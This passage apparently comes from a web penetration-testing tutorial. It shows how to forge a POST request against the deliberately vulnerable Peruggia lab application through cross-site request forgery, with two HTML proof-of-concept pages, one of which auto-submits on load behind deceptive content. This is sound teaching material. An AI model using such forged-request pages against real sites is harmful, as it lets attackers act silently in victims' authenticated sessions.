In this section, we will focus on exploiting a POST request. We will use Peruggia's user-creation functionality for this exercise. The first step is that you need to know how the request that you want to replicate works; if you log in as admin to Peruggia and create a new user while capturing the traffic with Burp Suite, you can see that the request appears as follows:

The request only includes the newuser (username) and newuserpass (password) parameters. Thus, once the request and parameters that make the change are identified, we need to do the following:

1. Create an HTML page that generates the request with those parameters and the information that you want to use.
2. Convince the user to browse to your page and submit the request. The latter may not be necessary, as you can have the page autosubmit the form.

An elaborate HTML, like the following, is required to accomplish our objective. In this, example the vulnerable server is 10.7.7.5:

<HTML> 
  <body> 
    <form method="POST" action="http://10.7.7.5/peruggia/index.php?action=account&adduser=1"> 
      <input type="text" value="CSRFuser" name="newuser"> 
      <input type="text" value="password123!" name="newuserpass"> 
      <input type="submit" value="Submit"> 
    </form> 
  </body> 
</HTML> 

The resulting page will look like the following screenshot. The bottom section is the Firefox developer tools panel. It can be activated using the F12 key:

In a regular penetration test, this may work as proof of concept (PoC) and be enough to demonstrate the existence of a vulnerability. A more sophisticated version could include deceptive content and script code to autosubmit the request once the page is loaded:

<HTML> 
  <BODY> 
    ... 
    <!-- include attractive HTML content here --> 
    ... 
    <FORM id="csrf" method="POST" action="http://10.7.7.5/peruggia/index.php?action=account&adduser=1"> 
      <input type="text" value="CSRFuser" name="newuser"> 
      <input type="text" value="password123!" name="newuserpass"> 
      <input type="submit" value="Submit"> 
    </FORM> 
    <SCRIPT>document.getElementById("csrf").submit();</SCRIPT> 
  </BODY> 
</HTML> 

To test this PoC page, open Peruggia and start a session with the admin user (password: admin) and load the attacking page in a different tab or window of the same browser:

Next, click on the Submit button or simply load the page, if using the scripted version, and the request will be processed by the server as if it were sent by an authenticated user. Using the browser's developer tools, you can check that the request was sent to the target server and processed properly: